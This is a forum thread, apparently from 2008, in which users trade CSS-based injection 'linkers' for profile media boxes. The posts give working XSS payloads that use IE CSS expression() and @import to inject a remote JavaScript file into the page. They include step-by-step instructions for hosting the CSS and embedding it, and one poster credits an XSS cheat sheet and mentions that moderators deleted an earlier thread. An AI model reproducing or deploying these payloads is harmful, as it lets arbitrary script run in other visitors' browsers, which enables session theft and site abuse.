[quote=Ryanheart]The Code Below Works Fine
body { width:expression( function load(){ get=document.createElement("script"); get.type="text/javascript"; get.src="LINK OF ur compile JS FILE"; document.getElementsByTagName("head")[0].appendChild(get);} window.onload=load); }
1st Step-Get your JS URL
2nd Step-Replace "LINK OF ur compile JS FILE" with your JS URL
3rd Step-After replacing,.open notepad,.then copy your new code then paste it,.after pasting it make sure to save your file as css Ex. filename.css
4th Step-Upload your css file to any hosting site
5th Step-Get your CSS URL then use the linker below
<style type='text/css'>@_;import url(URL OF CSS);</style>
REMINDER: Dont Forget To Erase Underscore "_" before ;
Copy the linker to your media box and hit save,.,Its done
credits goes to switpotato,.,
Here's my profile and it works fine
Last edited by Ryanheart (Today 11:59:59)[/quote]
only work in IE, but not stable,,,,

n i'm not sure about stable linker for IE,,,
new linker same principal with my old linker:
apocalypse: [b]expression[/b](function buka(){a=document.createElement('script');a.src=' [b]URL_OF_JS[/b] ';document.getElementsByTagName('head')[0].appendChild(a);}buka());}</style><a id='apocalypse'> [b]URL_OF_JS[/b] </a>[/quote]
Its work perfectly for FF but same not stable for IE,,,,,
'cause i'm not sure [b]expression[/b] stable for IE,,,,
and on my thread post about new linker (now is closed n deleted by mods

), credit not from De Angel Deville but from here [b][url=http://ha.ckers.org/xss.html]http://ha.ckers.org/xss.html[/url] [/b] and my idea,,,,
Last edited by 4P0C4LYP53 (2008-05-19 01:26:54)